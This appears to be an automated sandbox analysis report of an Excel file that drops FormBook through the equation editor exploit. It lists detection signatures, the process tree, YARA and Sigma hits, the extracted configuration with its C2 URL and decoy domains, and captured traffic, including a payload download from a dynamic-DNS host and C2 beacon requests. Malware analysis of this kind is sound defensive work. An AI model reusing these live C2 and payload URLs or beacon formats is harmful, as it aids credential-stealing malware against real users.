Loading ...

Play interactive tourEdit tour

Analysis Report QTN3C2AF414EDF9_041873.xlsx

Overview

General Information

Sample Name:QTN3C2AF414EDF9_041873.xlsx
Analysis ID:356571
MD5:1b862193e621b4d67be94a2ec44fbf50
SHA1:0bab9195da974524c969404430f6a58b31303322
SHA256:709ae19031f48115d89fb3aeae68476aac8b17a1e97700c6beff820b7c54b8aa
Tags:FormbookVelvetSweatshopxlsx

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Connects to a URL shortener service
Drops PE files to the user root directory
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2312 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2296 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 260 cmdline: 'C:\Users\Public\vbc.exe' MD5: 2915C0AFB0B6B26A5A699965D2119F7A)
      • vbc.exe (PID: 2876 cmdline: 'C:\Users\Public\vbc.exe' MD5: 2915C0AFB0B6B26A5A699965D2119F7A)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • ipconfig.exe (PID: 3020 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: CABB20E171770FF64614A54C1F31C033)
            • cmd.exe (PID: 2952 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.856380692.xyz/nsag/"], "decoy": ["usopencoverage.com", "5bo5j.com", "deliveryourvote.com", "bestbuycarpethd.com", "worldsourcecloud.com", "glowtheblog.com", "translations.tools", "ithacapella.com", "machinerysubway.com", "aashlokhospitals.com", "athara-kiano.com", "anabittencourt.com", "hakimkhawatmi.com", "fashionwatchesstore.com", "krishnagiri.info", "tencenttexts.com", "kodairo.com", "ouitum.club", "robertbeauford.net", "polling.asia", "evoslancete.com", "4676sabalkey.com", "chechadskeitaro.com", "babyhopeful.com", "11376.xyz", "oryanomer.com", "jyxxfy.com", "scanourworld.com", "thevistadrinksco.com", "meow-cafe.com", "xfixpros.com", "botaniquecouture.com", "bkhlep.xyz", "mauriciozarate.com", "icepolo.com", "siyezim.com", "myfeezinc.com", "nooshone.com", "wholesalerbargains.com", "winabeel.com", "frankfrango.com", "patientsbooking.info", "ineedahealer.com", "thefamilyorchard.net", "clericallyco.com", "overseaexpert.com", "bukaino.net", "womens-secrets.love", "skinjunkie.site", "dccheavydutydiv.net", "explorerthecity.com", "droneserviceshouston.com", "creationsbyjamie.com", "profirma-nachfolge.com", "oasisbracelet.com", "maurobenetti.com", "mecs.club", "mistressofherdivinity.com", "vooronsland.com", "navia.world", "commagx4.info", "caresring.com", "yourstrivingforexcellence.com", "alpinevalleytimeshares.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.vbc.exe.2900000.8.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.vbc.exe.2900000.8.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.vbc.exe.2900000.8.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        5.2.vbc.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.vbc.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2296, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 260
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 54.67.57.56, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2296, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2296, TargetFilename: C:\Users\Public\vbc.exe
          Sigma detected: Executables Started in Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2296, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 260
          Sigma detected: Execution in Non-Executable FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2296, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 260
          Sigma detected: Suspicious Program Location Process StartsShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2296, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 260

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 5.2.vbc.exe.400000.0.unpackMalware Configuration Extractor: FormBook {"C2 list": ["www.856380692.xyz/nsag/"], "decoy": ["usopencoverage.com", "5bo5j.com", "deliveryourvote.com", "bestbuycarpethd.com", "worldsourcecloud.com", "glowtheblog.com", "translations.tools", "ithacapella.com", "machinerysubway.com", "aashlokhospitals.com", "athara-kiano.com", "anabittencourt.com", "hakimkhawatmi.com", "fashionwatchesstore.com", "krishnagiri.info", "tencenttexts.com", "kodairo.com", "ouitum.club", "robertbeauford.net", "polling.asia", "evoslancete.com", "4676sabalkey.com", "chechadskeitaro.com", "babyhopeful.com", "11376.xyz", "oryanomer.com", "jyxxfy.com", "scanourworld.com", "thevistadrinksco.com", "meow-cafe.com", "xfixpros.com", "botaniquecouture.com", "bkhlep.xyz", "mauriciozarate.com", "icepolo.com", "siyezim.com", "myfeezinc.com", "nooshone.com", "wholesalerbargains.com", "winabeel.com", "frankfrango.com", "patientsbooking.info", "ineedahealer.com", "thefamilyorchard.net", "clericallyco.com", "overseaexpert.com", "bukaino.net", "womens-secrets.love", "skinjunkie.site", "dccheavydutydiv.net", "explorerthecity.com", "droneserviceshouston.com", "creationsbyjamie.com", "profirma-nachfolge.com", "oasisbracelet.com", "maurobenetti.com", "mecs.club", "mistressofherdivinity.com", "vooronsland.com", "navia.world", "commagx4.info", "caresring.com", "yourstrivingforexcellence.com", "alpinevalleytimeshares.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winlog[1]ReversingLabs: Detection: 36%
          Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 36%
          Multi AV Scanner detection for submitted fileShow sources
          Source: QTN3C2AF414EDF9_041873.xlsxVirustotal: Detection: 33%Perma Link
          Source: QTN3C2AF414EDF9_041873.xlsxReversingLabs: Detection: 25%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.2900000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.2900000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winlog[1]Joe Sandbox ML: detected
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: 5.2.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.vbc.exe.2900000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.1.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

          Compliance:

          barindex
          Uses new MSVCR DllsShow sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Binary contains paths to debug symbolsShow sources
          Source: Binary string: ipconfig.pdb source: vbc.exe, 00000005.00000002.2205835901.00000000004F9000.00000004.00000020.sdmp
          Source: Binary string: ipconfig.pdbN source: vbc.exe, 00000005.00000002.2205835901.00000000004F9000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, ipconfig.exe
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004065C1 FindFirstFileA,FindClose,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004027A1 FindFirstFileA,
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop esi
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop ebx
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop esi
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop ebx
          Source: global trafficDNS query: name: ow.ly
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.67.57.56:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.67.57.56:80

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.856380692.xyz/nsag/
          Connects to a URL shortener serviceShow sources
          Source: unknownDNS query: name: ow.ly
          Source: unknownDNS query: name: ow.ly
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 23 Feb 2021 09:26:00 GMTServer: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38Last-Modified: Tue, 23 Feb 2021 07:55:07 GMTETag: "35218-5bbfc3ca9d9e8"Accept-Ranges: bytesContent-Length: 217624Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 29 81 e9 50 47 d2 e9 50 47 d2 e9 50 47 d2 2a 5f 18 d2 eb 50 47 d2 e9 50 46 d2 49 50 47 d2 2a 5f 1a d2 e6 50 47 d2 bd 73 77 d2 e3 50 47 d2 2e 56 41 d2 e8 50 47 d2 52 69 63 68 e9 50 47 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5f d7 24 5f 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 66 00 00 00 78 02 00 00 04 00 00 86 34 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 90 03 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 85 00 00 a0 00 00 00 00 80 03 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ad 65 00 00 00 10 00 00 00 66 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 80 13 00 00 00 80 00 00 00 14 00 00 00 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 55 02 00 00 a0 00 00 00 06 00 00 00 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 7c 09 00 00 00 80 03 00 00 0a 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
          Source: global trafficHTTP traffic detected: GET /nsag/?SFN=S6to9wknRE4YQNZFkHgt/L/SBo+9VyFJxmA+r1dPkJtX1rvSVI6t0SymKIjP48fhKDCKWg==&cBb=LtD0g HTTP/1.1Host: www.fashionwatchesstore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?SFN=1e70w6qoH0iHBmxDX27vpOpA5lfYuhHzBJ3+ZXyYbvrIHeDq+MUfY30bwUf90UJ6GkTmZw==&cBb=LtD0g HTTP/1.1Host: www.athara-kiano.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?SFN=toXeTgYrlJ3t8R2kv84tVNAusZG5KBfjoz4tCiNIzgm9lAElLlwfiIUD/nI/OmI1vpPL+Q==&cBb=LtD0g HTTP/1.1Host: www.overseaexpert.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 103.140.251.164 103.140.251.164
          Source: Joe Sandbox ViewIP Address: 54.67.57.56 54.67.57.56
          Source: Joe Sandbox ViewASN Name: ASDETUKhttpwwwheficedcomGB ASDETUKhttpwwwheficedcomGB
          Source: global trafficHTTP traffic detected: GET /omCE30rxT5x HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ow.lyConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /receipat/winlog.exe?platform=hootsuite HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: algreenstdykeghestqw.dns.army
          Source: C:\Windows\explorer.exeCode function: 6_2_0293C302 getaddrinfo,setsockopt,recv,
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E1722339.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /omCE30rxT5x HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ow.lyConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /receipat/winlog.exe?platform=hootsuite HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: algreenstdykeghestqw.dns.army
          Source: global trafficHTTP traffic detected: GET /nsag/?SFN=S6to9wknRE4YQNZFkHgt/L/SBo+9VyFJxmA+r1dPkJtX1rvSVI6t0SymKIjP48fhKDCKWg==&cBb=LtD0g HTTP/1.1Host: www.fashionwatchesstore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?SFN=1e70w6qoH0iHBmxDX27vpOpA5lfYuhHzBJ3+ZXyYbvrIHeDq+MUfY30bwUf90UJ6GkTmZw==&cBb=LtD0g HTTP/1.1Host: www.athara-kiano.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?SFN=toXeTgYrlJ3t8R2kv84tVNAusZG5KBfjoz4tCiNIzgm9lAElLlwfiIUD/nI/OmI1vpPL+Q==&cBb=LtD0g HTTP/1.1Host: www.overseaexpert.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
